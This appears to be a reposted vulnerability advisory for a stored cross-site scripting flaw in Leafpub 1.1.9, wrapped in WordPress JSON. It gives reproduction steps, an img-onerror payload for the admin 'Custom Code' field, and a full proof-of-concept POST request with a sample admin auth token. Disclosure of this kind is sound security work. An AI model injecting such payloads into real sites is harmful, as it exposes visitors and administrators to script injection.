# Leafpub 1.1.9 – Stored Cross-Site Scripting (XSS)
# Date: 2024-04-24
# Exploit Author: Ahmet \u00dcmit BAYRAM
# Vendor Homepage: https:\/\/github.com\/Leafpub
# Software Link: https:\/\/github.com\/Leafpub\/leafpub
# Version: 1.1.9
# Tested on: MacOS<\/p>\n
### Steps to Reproduce ###<\/p>\n
– Please login from this address: http:\/\/localhost\/leafpub\/admin\/login
– Click on the Settings > Advanced
– Enter the following payload into the “Custom Code” area and save it: (“><img
src=x onerror=alert(“Stored”)>)
– An alert message saying “Stored” will appear in front of you.<\/p>\n
### PoC Request ###<\/p>\n
POST \/leafpub\/api\/settings HTTP\/1.1
Host: localhost
Cookie:
authToken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTM5NjQ2MTcsImV4cCI6MTcxMzk2ODIxNywiZGF0YSI6eyJ1c2VybmFtZSI6ImFkbWluIn19.967N5NYdUKxv1sOXO_OTFiiLlm7sfgDWPXKX7iEZwlo
User-Agent: Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko\/20100101 Firefox\/124.0
Accept: *\/*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application\/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 476
Origin: http:\/\/localhost
Referer: http:\/\/localhost\/leafpub\/admin\/settings
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close<\/p>\n
title=A+Leafpub+Blog&tagline=Go+forth+and+create!&homepage=&twitter=&theme=range&posts-per-page=10&cover=source%2Fassets%2Fimg%2Fleaves.jpg&logo=source%2Fassets%2Fimg%2Flogo-color.png&favicon=source%2Fassets%2Fimg%2Flogo-color.png&language=en-us&timezone=America%2FNew_York&default-title=Untitled+Post&default-content=Start+writing+here…&head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E&foot-code=&generator=on&mailer=default&maintenance-message=&hbs-cache=on<\/p>\n","protected":false},"excerpt":{"rendered":"
# Leafpub 1.1.9 – Stored Cross-Site Scripting (XSS)# Date: 2024-04-24# Exploit Author: Ahmet \u00dcmit BAYRAM# Vendor Homepage: https:\/\/github.com\/Leafpub# Software Link: https:\/\/github.com\/Leafpub\/leafpub# Version: 1.1.9# Tested on: MacOS ### Steps to Reproduce ### – Please login from this address: http:\/\/localhost\/leafpub\/admin\/login– Click on the Settings > Advanced– Enter the following payload into the “Custom Code” area and save …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56839","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56839","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56839"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56839\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56839"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56839"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56839"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}